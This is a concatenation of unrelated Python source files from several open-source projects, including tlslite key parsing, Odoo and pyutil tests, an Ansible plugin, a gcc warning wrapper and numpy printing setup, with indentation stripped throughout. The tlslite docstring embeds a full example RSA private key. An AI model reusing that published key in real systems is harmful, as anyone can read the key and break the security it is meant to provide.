from Python_RSAKey import Python_RSAKey
import cryptomath
if cryptomath.m2cryptoLoaded:
from OpenSSL_RSAKey import OpenSSL_RSAKey
if cryptomath.pycryptoLoaded:
from PyCrypto_RSAKey import PyCrypto_RSAKey
# **************************************************************************
# Factory Functions for RSA Keys
# **************************************************************************
def generateRSAKey(bits, implementations=["openssl", "python"]):
"""Generate an RSA key with the specified bit length.
@type bits: int
@param bits: Desired bit length of the new key's modulus.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: A new RSA private key.
"""
for implementation in implementations:
if implementation == "openssl" and cryptomath.m2cryptoLoaded:
return OpenSSL_RSAKey.generate(bits)
elif implementation == "python":
return Python_RSAKey.generate(bits)
raise ValueError("No acceptable implementations")
def parseXMLKey(s, private=False, public=False, implementations=["python"]):
"""Parse an XML-format key.
The XML format used here is specific to tlslite and cryptoIDlib. The
format can store the public component of a key, or the public and
private components. For example::
<publicKey xmlns="http://trevp.net/rsa">
<n>4a5yzB8oGNlHo866CAspAC47M4Fvx58zwK8pou...
<e>Aw==</e>
</publicKey>
<privateKey xmlns="http://trevp.net/rsa">
<n>4a5yzB8oGNlHo866CAspAC47M4Fvx58zwK8pou...
<e>Aw==</e>
<d>JZ0TIgUxWXmL8KJ0VqyG1V0J3ern9pqIoB0xmy...
<p>5PreIj6z6ldIGL1V4+1C36dQFHNCQHJvW52GXc...
<q>/E/wDit8YXPCxx126zTq2ilQ3IcW54NJYyNjiZ...
<dP>mKc+wX8inDowEH45Qp4slRo1YveBgExKPROu6...
<dQ>qDVKtBz9lk0shL5PR3ickXDgkwS576zbl2ztB...
<qInv>j6E8EA7dNsTImaXexAmLA1DoeArsYeFAInr...
</privateKey>
@type s: str
@param s: A string containing an XML public or private key.
@type private: bool
@param private: If True, a L{SyntaxError} will be raised if the private
key component is not present.
@type public: bool
@param public: If True, the private key component (if present) will be
discarded, so this function will always return a public key.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA key.
@raise SyntaxError: If the key is not properly formatted.
"""
for implementation in implementations:
if implementation == "python":
key = Python_RSAKey.parseXML(s)
break
else:
raise ValueError("No acceptable implementations")
return _parseKeyHelper(key, private, public)
#Parse as an OpenSSL or Python key
def parsePEMKey(s, private=False, public=False, passwordCallback=None,
implementations=["openssl", "python"]):
"""Parse a PEM-format key.
The PEM format is used by OpenSSL and other tools. The
format is typically used to store both the public and private
components of a key. For example::
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDYscuoMzsGmW0pAYsmyHltxB2TdwHS0dImfjCMfaSDkfLdZY5+
dOWORVns9etWnr194mSGA1F0Pls/VJW8+cX9+3vtJV8zSdANPYUoQf0TP7VlJxkH
dSRkUbEoz5bAAs/+970uos7n7iXQIni+3erUTdYEk2iWnMBjTljfgbK/dQIDAQAB
AoGAJHoJZk75aKr7DSQNYIHuruOMdv5ZeDuJvKERWxTrVJqE32/xBKh42/IgqRrc
esBN9ZregRCd7YtxoL+EVUNWaJNVx2mNmezEznrc9zhcYUrgeaVdFO2yBF1889zO
gCOVwrO8uDgeyj6IKa25H6c1N13ih/o7ZzEgWbGG+ylU1yECQQDv4ZSJ4EjSh/Fl
aHdz3wbBa/HKGTjC8iRy476Cyg2Fm8MZUe9Yy3udOrb5ZnS2MTpIXt5AF3h2TfYV
VoFXIorjAkEA50FcJmzT8sNMrPaV8vn+9W2Lu4U7C+K/O2g1iXMaZms5PC5zV5aV
CKXZWUX1fq2RaOzlbQrpgiolhXpeh8FjxwJBAOFHzSQfSsTNfttp3KUpU0LbiVvv
i+spVSnA0O4rq79KpVNmK44Mq67hsW1P11QzrzTAQ6GVaUBRv0YS061td1kCQHnP
wtN2tboFR6lABkJDjxoGRvlSt4SOPr7zKGgrWjeiuTZLHXSAnCY+/hr5L9Q3ZwXG
6x6iBdgLjVIe4BZQNtcCQQDXGv/gWinCNTN3MPWfTW/RGzuMYVmyBFais0/VrgdH
h1dLpztmpQqfyH/zrBXQ9qL/zR4ojS6XYneO/U18WpEe
-----END RSA PRIVATE KEY-----
To generate a key like this with OpenSSL, run::
openssl genrsa 2048 > key.pem
This format also supports password-encrypted private keys. TLS
Lite can only handle password-encrypted private keys when OpenSSL
and M2Crypto are installed. In this case, passwordCallback will be
invoked to query the user for the password.
@type s: str
@param s: A string containing a PEM-encoded public or private key.
@type private: bool
@param private: If True, a L{SyntaxError} will be raised if the
private key component is not present.
@type public: bool
@param public: If True, the private key component (if present) will
be discarded, so this function will always return a public key.
@type passwordCallback: callable
@param passwordCallback: This function will be called, with no
arguments, if the PEM-encoded private key is password-encrypted.
The callback should return the password string. If the password is
incorrect, SyntaxError will be raised. If no callback is passed
and the key is password-encrypted, a prompt will be displayed at
the console.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA key.
@raise SyntaxError: If the key is not properly formatted.
"""
for implementation in implementations:
if implementation == "openssl" and cryptomath.m2cryptoLoaded:
key = OpenSSL_RSAKey.parse(s, passwordCallback)
break
elif implementation == "python":
key = Python_RSAKey.parsePEM(s)
break
else:
raise ValueError("No acceptable implementations")
return _parseKeyHelper(key, private, public)
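# Usage sketch (illustrative; the file name is hypothetical): parse a
# password-protected PEM private key, supplying the password via a callback.
#
#     pem_data = open("server_key.pem").read()
#     key = parsePEMKey(pem_data, private=True,
#                       passwordCallback=lambda: "example-password")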
def _parseKeyHelper(key, private, public):
if private:
if not key.hasPrivateKey():
raise SyntaxError("Not a private key!")
if public:
return _createPublicKey(key)
if private:
if hasattr(key, "d"):
return _createPrivateKey(key)
else:
return key
return key
def parseAsPublicKey(s):
"""Parse an XML or PEM-formatted public key.
@type s: str
@param s: A string containing an XML or PEM-encoded public or private key.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA public key.
@raise SyntaxError: If the key is not properly formatted.
"""
try:
return parsePEMKey(s, public=True)
except:
return parseXMLKey(s, public=True)
def parsePrivateKey(s):
"""Parse an XML or PEM-formatted private key.
@type s: str
@param s: A string containing an XML or PEM-encoded private key.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA private key.
@raise SyntaxError: If the key is not properly formatted.
"""
try:
return parsePEMKey(s, private=True)
except:
return parseXMLKey(s, private=True)
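# The two convenience wrappers above simply try PEM parsing first and fall
# back to XML. Illustrative sketch (hypothetical file name):
#
#     data = open("server_key.pem").read()
#     pub = parseAsPublicKey(data)   # always returns a public key
#     priv = parsePrivateKey(data)   # raises SyntaxError if no private part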
def _createPublicKey(key):
"""
Create a new public key. Discard any private component,
and return the most efficient key possible.
"""
if not isinstance(key, RSAKey):
raise AssertionError()
return _createPublicRSAKey(key.n, key.e)
def _createPrivateKey(key):
"""
Create a new private key. Return the most efficient key possible.
"""
if not isinstance(key, RSAKey):
raise AssertionError()
if not key.hasPrivateKey():
raise AssertionError()
return _createPrivateRSAKey(key.n, key.e, key.d, key.p, key.q, key.dP,
key.dQ, key.qInv)
def _createPublicRSAKey(n, e, implementations = ["openssl", "pycrypto",
"python"]):
for implementation in implementations:
if implementation == "openssl" and cryptomath.m2cryptoLoaded:
return OpenSSL_RSAKey(n, e)
elif implementation == "pycrypto" and cryptomath.pycryptoLoaded:
return PyCrypto_RSAKey(n, e)
elif implementation == "python":
return Python_RSAKey(n, e)
raise ValueError("No acceptable implementations")
def _createPrivateRSAKey(n, e, d, p, q, dP, dQ, qInv,
implementations = ["pycrypto", "python"]):
for implementation in implementations:
if implementation == "pycrypto" and cryptomath.pycryptoLoaded:
return PyCrypto_RSAKey(n, e, d, p, q, dP, dQ, qInv)
elif implementation == "python":
return Python_RSAKey(n, e, d, p, q, dP, dQ, qInv)
raise ValueError("No acceptable implementations")
|
buguelos/odoo
|
refs/heads/master
|
addons/lunch/tests/test_lunch.py
|
345
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.tests import common
class Test_Lunch(common.TransactionCase):
def setUp(self):
"""*****setUp*****"""
super(Test_Lunch, self).setUp()
cr, uid = self.cr, self.uid
self.res_users = self.registry('res.users')
self.lunch_order = self.registry('lunch.order')
self.lunch_order_line = self.registry('lunch.order.line')
self.lunch_cashmove = self.registry('lunch.cashmove')
self.lunch_product = self.registry('lunch.product')
self.lunch_alert = self.registry('lunch.alert')
self.lunch_product_category = self.registry('lunch.product.category')
self.demo_id = self.res_users.search(cr, uid, [('name', '=', 'Demo User')])
self.product_bolognese_ref = self.registry('ir.model.data').get_object_reference(cr, uid, 'lunch', 'product_Bolognese')
self.product_Bolognese_id = self.product_bolognese_ref and self.product_bolognese_ref[1] or False
self.new_id_order = self.lunch_order.create(cr,uid,{
'user_id': self.demo_id[0],
'order_line_ids':'[]',
},context=None)
self.new_id_order_line = self.lunch_order_line.create(cr,uid,{
'order_id':self.new_id_order,
'product_id':self.product_Bolognese_id,
'note': '+Emmental',
'cashmove': [],
'price': self.lunch_product.browse(cr,uid,self.product_Bolognese_id,context=None).price,
})
def test_00_lunch_order(self):
"""Change the state of an order line from 'new' to 'ordered'. Check that there are no cashmove linked to that order line"""
cr, uid = self.cr, self.uid
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#we check that our order_line is a 'new' one and that there is no cashmove linked to that order_line:
self.assertEqual(self.order_one.state,'new')
self.assertEqual(list(self.order_one.cashmove), [])
#we order that orderline so its state will be 'ordered'
self.order_one.order()
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#we check that our order_line is an 'ordered' one and that there is no cashmove linked to that order_line:
self.assertEqual(self.order_one.state,'ordered')
self.assertEqual(list(self.order_one.cashmove), [])
def test_01_lunch_order(self):
"""Change the state of an order line from 'new' to 'ordered' then to 'confirmed'. Check that there is a cashmove linked to the order line"""
cr, uid = self.cr, self.uid
self.test_00_lunch_order()
#We receive the order so we confirm the order line so its state will be 'confirmed'
#A cashmove will be created and we will test that the cashmove amount equals the order line price
self.order_one.confirm()
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#we check that our order_line is a 'confirmed' one and that there is a cashmove linked to that order_line with an amount equal to the order line price:
self.assertEqual(self.order_one.state,'confirmed')
self.assertTrue(self.order_one.cashmove)
self.assertTrue(self.order_one.cashmove[0].amount==-self.order_one.price)
def test_02_lunch_order(self):
"""Change the state of an order line from 'confirmed' to 'cancelled' and check that the cashmove linked to that order line will be deleted"""
cr, uid = self.cr, self.uid
self.test_01_lunch_order()
#We have a confirmed order with its associate cashmove
#We execute the cancel function
self.order_one.cancel()
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#We check that the state is cancelled and that the cashmove has been deleted
self.assertEqual(self.order_one.state,'cancelled')
self.assertFalse(self.order_one.cashmove)
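#Summary of the state flow exercised by the three tests above (comment only):
#'new' --order()--> 'ordered' --confirm()--> 'confirmed' (a cashmove is
#created with amount == -price) --cancel()--> 'cancelled' (cashmove deleted)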
|
agaffney/ansible
|
refs/heads/devel
|
test/support/network-integration/collections/ansible_collections/ansible/netcommon/plugins/action/net_base.py
|
47
|
# Copyright: (c) 2015, Ansible Inc,
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import copy
from ansible.errors import AnsibleError
from ansible.plugins.action import ActionBase
from ansible.utils.display import Display
display = Display()
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=None):
del tmp # tmp no longer has any effect
result = {}
play_context = copy.deepcopy(self._play_context)
play_context.network_os = self._get_network_os(task_vars)
new_task = self._task.copy()
module = self._get_implementation_module(
play_context.network_os, self._task.action
)
if not module:
if self._task.args["fail_on_missing_module"]:
result["failed"] = True
else:
result["failed"] = False
result["msg"] = (
"Could not find implementation module %s for %s"
% (self._task.action, play_context.network_os)
)
return result
new_task.action = module
action = self._shared_loader_obj.action_loader.get(
play_context.network_os,
task=new_task,
connection=self._connection,
play_context=play_context,
loader=self._loader,
templar=self._templar,
shared_loader_obj=self._shared_loader_obj,
)
display.vvvv("Running implementation module %s" % module)
return action.run(task_vars=task_vars)
def _get_network_os(self, task_vars):
if "network_os" in self._task.args and self._task.args["network_os"]:
display.vvvv("Getting network OS from task argument")
network_os = self._task.args["network_os"]
elif self._play_context.network_os:
display.vvvv("Getting network OS from inventory")
network_os = self._play_context.network_os
elif (
"network_os" in task_vars.get("ansible_facts", {})
and task_vars["ansible_facts"]["network_os"]
):
display.vvvv("Getting network OS from fact")
network_os = task_vars["ansible_facts"]["network_os"]
else:
raise AnsibleError(
"ansible_network_os must be specified on this host to use platform agnostic modules"
)
return network_os
def _get_implementation_module(self, network_os, platform_agnostic_module):
module_name = (
network_os.split(".")[-1]
+ "_"
+ platform_agnostic_module.partition("_")[2]
)
if "." in network_os:
fqcn_module = ".".join(network_os.split(".")[0:-1])
implementation_module = fqcn_module + "." + module_name
else:
implementation_module = module_name
if implementation_module not in self._shared_loader_obj.module_loader:
implementation_module = None
return implementation_module
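# Illustrative walk-through of the name derivation above (values are
# hypothetical): with network_os "cisco.ios.ios" and task action
# "net_banner",
#
#     module_name = "ios" + "_" + "banner"       -> "ios_banner"
#     fqcn_module = "cisco.ios"
#     implementation_module                      -> "cisco.ios.ios_banner"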
|
rkokkelk/CouchPotatoServer
|
refs/heads/master
|
libs/pyutil/test/deprecated/test_xor.py
|
106
|
#!/usr/bin/env python
# Copyright (c) 2002-2009 Zooko Wilcox-O'Hearn
# portions Copyright (c) 2001 Autonomous Zone Industries
# This file is part of pyutil; see README.rst for licensing terms.
#
import unittest
from pyutil.xor import xor
# unit tests
def _help_test(xf):
assert xf('\000', '\000') == '\000'
assert xf('\001', '\000') == '\001'
assert xf('\001', '\001') == '\000'
assert xf('\000\001', '\000\001') == '\000\000'
assert xf('\100\101', '\000\101') == '\100\000'
class Testy(unittest.TestCase):
def test_em(self):
for xorfunc in (xor.py_xor, xor.py_xor_simple, xor.xor,):
if callable(xorfunc):
# print "testing xorfunc ", xorfunc
_help_test(xorfunc)
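# For reference, a bytewise XOR with the semantics asserted above could be
# sketched as follows (hypothetical; not pyutil's actual implementation):
#
#     def xor_sketch(a, b):
#         return ''.join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))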
|
pahaz/prospector
|
refs/heads/master
|
tests/finder/testdata/test1/package1/__init__.py
|
12133432
| |
dhruvagarwal/django
|
refs/heads/master
|
tests/generic_relations_regress/__init__.py
|
12133432
| |
snorp/hyde
|
refs/heads/master
|
repos/__init__.py
|
12133432
| |
yungchin/pykafka
|
refs/heads/master
|
tests/pykafka/__init__.py
|
12133432
| |
ELNOGAL/CMNT_00040_2016_ELN_addons
|
refs/heads/master
|
product_data_sheet/wizard/__init__.py
|
2
|
# -*- coding: utf-8 -*-
# Copyright 2021 El Nogal - Pedro Gómez <pegomez@elnogal.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import copy_product_ldm
|
dtsinc/DTS-Sound-Integration_CAF-Android-kernel
|
refs/heads/master
|
scripts/gcc-wrapper.py
|
90
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:63",
"kprobes.c:1493",
"rcutree.c:1614",
"af_unix.c:893",
"nl80211.c:58",
"jhash.h:137",
"cmpxchg.h:201",
"ping.c:87",
])
# Capture the name of the object file, so we can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
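# Example of a line warning_re would capture (hypothetical warning):
#
#     "fs/ext4/inode.c:1437:12: warning: unused variable 'ret'"
#
# Here m.group(2) is "inode.c:1437", which is then checked against
# allowed_warnings before failing the build.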
|
k0ste/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/facts/network/darwin.py
|
128
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.network.generic_bsd import GenericBsdIfconfigNetwork
class DarwinNetwork(GenericBsdIfconfigNetwork):
"""
This is the macOS (Darwin) Network Class.
It uses the GenericBsdIfconfigNetwork class unchanged.
"""
platform = 'Darwin'
# media line is different from the default FreeBSD one
def parse_media_line(self, words, current_if, ips):
# not sure if this is useful - we also drop information
current_if['media'] = 'Unknown' # Mac does not give us this
current_if['media_select'] = words[1]
if len(words) > 2:
# MacOSX sets the media to '<unknown type>' for bridge interface
# and parsing splits this into two words; this if/else helps
if words[1] == '<unknown' and words[2] == 'type>':
current_if['media_select'] = 'Unknown'
current_if['media_type'] = 'unknown type'
else:
current_if['media_type'] = words[2][1:-1]
if len(words) > 3:
current_if['media_options'] = self.get_options(words[3])
class DarwinNetworkCollector(NetworkCollector):
_fact_class = DarwinNetwork
_platform = 'Darwin'
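# Illustrative: on a bridge interface Darwin's ifconfig prints
# "media: <unknown type>", so words == ['media:', '<unknown', 'type>'] and
# the special case in parse_media_line above normalizes media_select and
# media_type instead of reading a bracketed media type.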
|
lenoch/tagsetbench
|
refs/heads/master
|
html_writer.py
|
1
|
from collections import OrderedDict
from pathlib import PosixPath
with PosixPath(__file__).with_name('template.html').open() as f:
raw_template = f.read()
before_content, after_content = raw_template.split('\n{content}\n')
# TODO: maybe drop this?
def header(title='', argv=None):
if not argv:
argv = {}
return before_content.format(title=title, input_params=argv)
def evaluation_summary(side, summary):
# table layout:
# a horizontal header with as many columns as there are attributes,
# or with columns corresponding to direct/indirect evaluation
# ⇒ all attributes side by side, with direct and indirect right next to each other
# header with attributes
attributes = list(sorted(attrs for (attrs, values) in summary.items() if
isinstance(values, dict)))
value_names = {
'precision': 'Token precision', # TODO: also Sentence precision?
'correct': 'Correct tokens',
'total': 'Total tokens',
}
# reference, compared or difference
yield '<tr><th>{}<th><td colspan="20">{}</td></tr>'.format(side,
'') # formerly: changes
yield '<tr><th>{}</th></tr>'.format(
'</th><th>'.join([''] + attributes + ['']) # side cells blank
)
for value in ('precision', 'correct', 'total'):
yield '<tr><th>{}</th><td>{}</td><th>{}</th></tr>'.format(
value_names[value],
'</td><td>'.join(str(summary[attr][value]) for attr in attributes),
value_names[value],
)
def evaluation_summary_sides_horizontal(attr, summary):
value_names = OrderedDict([
('total', 'Total tokens'),
('correct', 'Correct tokens'),
('precision', 'Category accuracy'),
# TODO: overall accuracy (simply the ratio of wrong/correct tokens to all
# tokens, as in the error group/cluster overviews)
# TODO: also Sentence precision?
])
header = [attr] + list(value_names.values())
yield from simple_table([], header, enclose_in_tags=False)
sides = ['reference', 'compared', 'difference'] # TODO: 'gain'
for side in sides:
yield table_row([side] +
[summary[side][attr][value] for value in value_names])
# TODO: a switch controlling whether to emit <table> and </table> as well
# DONE: hard-coded for now; a <table id="{table_id}"
# class="{table_class}"> variant may be added later
def simple_table(sorted_list, columns=None, header_lines=0,
enclose_in_tags=True, footer=False):
if enclose_in_tags:
yield '<table>'
headers = []
if columns:
headers.append(columns)
rows = iter(sorted_list)
for i in range(header_lines):
headers.append(next(rows))
for header in headers:
# TODO: use the table_row function once it has been generalized
yield '<tr><th>{}</th></tr>'.format(
'</th><th>'.join(header),
)
for row in rows:
yield table_row(row)
if footer:
for header in reversed(headers):
yield '<tr><th>{}</th></tr>'.format(
'</th><th>'.join(header),
)
if enclose_in_tags:
yield '</table>'
# TODO: generalize this somehow so that simple_table can use it?
# – e.g. with a second list holding True/False depending on whether
# a cell is a plain cell or a header (and simply zip_longest the two)
def table_row(values):
# return '<tr><th>{}</th>{}</tr>'.format(
# header, ''.join('<td>{}</td>'.format(value) for value in values))
return '<tr>{}</tr>'.format(
''.join('<td>{}</td>'.format(format_value(value)) for value in values))
# the counterpart (which parses this) lives in compare_evaluation.py
def format_value(value):
if isinstance(value, float):
return format(value, '0.3%')
else:
return value
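# Usage sketch (illustrative values): rendering a small two-column table.
#
#     rows = [['dog', 0.5], ['cat', 0.25]]
#     html = '\n'.join(simple_table(rows, columns=['word', 'freq']))
#     # -> <table>, a <th> header row, then e.g.
#     #    <tr><td>dog</td><td>50.000%</td></tr> ... </table>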
|
wskplho/sl4a
|
refs/heads/master
|
python/src/Tools/scripts/methfix.py
|
96
|
#! /usr/bin/env python
# Fix Python source files to avoid using
# def method(self, (arg1, ..., argn)):
# instead of the more rational
# def method(self, arg1, ..., argn):
#
# Command line arguments are files or directories to be processed.
# Directories are searched recursively for files whose name looks
# like a python module.
# Symbolic links are always ignored (except as explicit directory
# arguments). Of course, the original file is kept as a back-up
# (with a "~" attached to its name).
# It complains about binaries (files containing null bytes)
# and about files that are ostensibly not Python files: if the first
# line starts with '#!' and does not contain the string 'python'.
#
# Changes made are reported to stdout in a diff-like format.
#
# Undoubtedly you can do this using find and sed or perl, but this is
# a nice example of Python code that recurses down a directory tree
# and uses regular expressions. Also note several subtleties like
# preserving the file's mode and avoiding to even write a temp file
# when no changes are needed for a file.
#
# NB: by changing only the function fixline() you can turn this
# into a program for a different change to Python programs...
import sys
import re
import os
from stat import *
err = sys.stderr.write
dbg = err
rep = sys.stdout.write
def main():
bad = 0
if not sys.argv[1:]: # No arguments
err('usage: ' + sys.argv[0] + ' file-or-directory ...\n')
sys.exit(2)
for arg in sys.argv[1:]:
if os.path.isdir(arg):
if recursedown(arg): bad = 1
elif os.path.islink(arg):
err(arg + ': will not process symbolic links\n')
bad = 1
else:
if fix(arg): bad = 1
sys.exit(bad)
ispythonprog = re.compile('^[a-zA-Z0-9_]+\.py$')
def ispython(name):
return ispythonprog.match(name) >= 0
def recursedown(dirname):
dbg('recursedown(%r)\n' % (dirname,))
bad = 0
try:
names = os.listdir(dirname)
except os.error, msg:
err('%s: cannot list directory: %r\n' % (dirname, msg))
return 1
names.sort()
subdirs = []
for name in names:
if name in (os.curdir, os.pardir): continue
fullname = os.path.join(dirname, name)
if os.path.islink(fullname): pass
elif os.path.isdir(fullname):
subdirs.append(fullname)
elif ispython(name):
if fix(fullname): bad = 1
for fullname in subdirs:
if recursedown(fullname): bad = 1
return bad
def fix(filename):
## dbg('fix(%r)\n' % (filename,))
try:
f = open(filename, 'r')
except IOError, msg:
err('%s: cannot open: %r\n' % (filename, msg))
return 1
head, tail = os.path.split(filename)
tempname = os.path.join(head, '@' + tail)
g = None
# If we find a match, we rewind the file and start over but
# now copy everything to a temp file.
lineno = 0
while 1:
line = f.readline()
if not line: break
lineno = lineno + 1
if g is None and '\0' in line:
# Check for binary files
err(filename + ': contains null bytes; not fixed\n')
f.close()
return 1
if lineno == 1 and g is None and line[:2] == '#!':
# Check for non-Python scripts
words = line[2:].split()
if words and re.search('[pP]ython', words[0]) < 0:
msg = filename + ': ' + words[0]
msg = msg + ' script; not fixed\n'
err(msg)
f.close()
return 1
while line[-2:] == '\\\n':
nextline = f.readline()
if not nextline: break
line = line + nextline
lineno = lineno + 1
newline = fixline(line)
if newline != line:
if g is None:
try:
g = open(tempname, 'w')
except IOError, msg:
f.close()
err('%s: cannot create: %r\n' % (tempname, msg))
return 1
f.seek(0)
lineno = 0
rep(filename + ':\n')
continue # restart from the beginning
rep(repr(lineno) + '\n')
rep('< ' + line)
rep('> ' + newline)
if g is not None:
g.write(newline)
# End of file
f.close()
if not g: return 0 # No changes
# Finishing touch -- move files
# First copy the file's mode to the temp file
try:
statbuf = os.stat(filename)
os.chmod(tempname, statbuf[ST_MODE] & 07777)
except os.error, msg:
err('%s: warning: chmod failed (%r)\n' % (tempname, msg))
# Then make a backup of the original file as filename~
try:
os.rename(filename, filename + '~')
except os.error, msg:
err('%s: warning: backup failed (%r)\n' % (filename, msg))
# Now move the temp file to the original file
try:
os.rename(tempname, filename)
except os.error, msg:
err('%s: rename failed (%r)\n' % (filename, msg))
return 1
# Return success
return 0
fixpat = '^[ \t]+def +[a-zA-Z0-9_]+ *( *self *, *(( *(.*) *)) *) *:'
fixprog = re.compile(fixpat)
def fixline(line):
if fixprog.match(line) >= 0:
(a, b), (c, d) = fixprog.regs[1:3]
line = line[:a] + line[c:d] + line[b:]
return line
if __name__ == '__main__':
main()
|
martydill/url_shortener
|
refs/heads/master
|
code/venv/lib/python2.7/site-packages/dateutil/__init__.py
|
133
|
# -*- coding: utf-8 -*-
__version__ = "2.4.2"
|
biswajitsahu/kuma
|
refs/heads/master
|
vendor/packages/pygments/lexers/web.py
|
77
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.web
~~~~~~~~~~~~~~~~~~~
Just export previously exported lexers.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexers.html import HtmlLexer, DtdLexer, XmlLexer, XsltLexer, \
HamlLexer, ScamlLexer, JadeLexer
from pygments.lexers.css import CssLexer, SassLexer, ScssLexer
from pygments.lexers.javascript import JavascriptLexer, LiveScriptLexer, \
DartLexer, TypeScriptLexer, LassoLexer, ObjectiveJLexer, CoffeeScriptLexer
from pygments.lexers.actionscript import ActionScriptLexer, \
ActionScript3Lexer, MxmlLexer
from pygments.lexers.php import PhpLexer
from pygments.lexers.webmisc import DuelLexer, XQueryLexer, SlimLexer, QmlLexer
from pygments.lexers.data import JsonLexer
JSONLexer = JsonLexer # for backwards compatibility with Pygments 1.5
__all__ = []
|
RalphBariz/RalphsDotNet
|
refs/heads/master
|
Old/RalphsDotNet.Apps.OptimizationStudio/Resources/PyLib/numpy/core/arrayprint.py
|
55
|
"""Array printing function
$Id: arrayprint.py,v 1.9 2005/09/13 13:58:44 teoliphant Exp $
"""
__all__ = ["array2string", "set_printoptions", "get_printoptions"]
__docformat__ = 'restructuredtext'
#
# Written by Konrad Hinsen <hinsenk@ere.umontreal.ca>
# last revision: 1996-3-13
# modified by Jim Hugunin 1997-3-3 for repr's and str's (and other details)
# and by Perry Greenfield 2000-4-1 for numarray
# and by Travis Oliphant 2005-8-22 for numpy
import sys
import numerictypes as _nt
from umath import maximum, minimum, absolute, not_equal, isnan, isinf
from multiarray import format_longfloat
from fromnumeric import ravel
def product(x, y): return x*y
_summaryEdgeItems = 3 # repr N leading and trailing items of each dimension
_summaryThreshold = 1000 # total items > triggers array summarization
_float_output_precision = 8
_float_output_suppress_small = False
_line_width = 75
_nan_str = 'nan'
_inf_str = 'inf'
